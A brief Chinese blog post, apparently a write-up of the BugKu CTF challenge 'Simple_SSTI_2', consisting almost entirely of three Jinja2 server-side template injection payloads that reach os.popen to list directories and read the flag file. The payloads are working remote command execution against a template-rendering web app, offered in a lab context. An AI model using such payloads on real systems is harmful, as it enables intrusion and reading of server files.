BugKu CTF Simple_SSTI_2

...从前写的wp不见了，可能是没保存

首先使用ls查看一下上级目录

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

直接进入第一个目录

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

发现flag文件

没有禁用cat 直接访问

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

得到flag

posted @ 2021-04-08 14:24 zap162 阅读(53) 评论(0) 收藏举报

刷新页面返回顶部

zap162